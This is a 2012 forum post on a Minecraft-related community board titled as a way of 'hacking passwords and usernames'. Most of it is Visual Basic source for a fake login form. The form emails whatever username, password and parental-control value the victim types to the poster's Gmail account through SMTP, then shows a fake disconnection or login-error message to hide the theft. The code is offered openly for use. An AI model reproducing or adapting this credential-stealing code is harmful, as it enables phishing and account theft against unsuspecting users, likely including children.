Lamecraft - Community
Dont have an account? You can register for free!

Join the forum, it's quick and easy

Lamecraft - Community
Dont have an account? You can register for free!
Lamecraft - Community
Would you like to react to this message? Create an account in a few clicks or log in to continue.

VB Send Emails also known as hacking passwords and usernames

Go down

VB Send Emails also known as hacking passwords and usernames Empty VB Send Emails also known as hacking passwords and usernames

Post  Nathan_123 Sat Jan 28, 2012 7:28 pm

Copyright Disclaimer Under Section 107 of the Copyright Act 1976, allowance is made for "fair use" for purposes such as criticism, comment, news reporting, teaching, scholarship, and research. Fair use is a use permitted by copyright statute that might otherwise be infringing. Non-profit, educational or personal use tips the balance in favor of fair use.
Code(add it to the ok or send buttom)it sends you a email with the person's pass and user Cow Slime Diamond Diamond Diamond :

Imports System.Net.Mail
Public Class Form1
Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
If TextBox1.Text = "" Then
MsgBox("You must enter an Username and password", MsgBoxStyle.Exclamation, "Log-In Problem")
If TextBox1.Text = "" Then
MsgBox("You must enter an Username and password", MsgBoxStyle.Exclamation, "Log-In Problem")
Else
End If
End If
Dim mail As New MailMessage()
Dim SmtpServer As New SmtpClient
SmtpServer.Credentials = New Net.NetworkCredential("YOUR GMAIL HERE", "GMAIL PASS HERE")
SmtpServer.Port = 587
SmtpServer.Host = "smtp.gmail.com"
SmtpServer.EnableSsl = True
mail.To.Add("UR GMAIL HERE")
mail.From = New MailAddress("YOUR GMAIL HERE")
mail.Subject = "Hack"
mail.Body = "UserName : " & TextBox1.Text & " / " & "Password : " & TextBox2.Text & " / " & "Parent Control : " & TextBox4.Text
Try
SmtpServer.Send(mail)
MsgBox("Disconeted", MsgBoxStyle.Critical, "Note")
Me.Close()
Catch ex As Exception
MsgBox("An Error Has Occured... Coudn't Log in", MsgBoxStyle.Exclamation, "Error, Please Retry")
End Try
End Sub

Nathan_123

Posts : 2
Reputation : 0
Join date : 2012-01-28

Back to top Go down

Back to top


 
Permissions in this forum:
You cannot reply to topics in this forum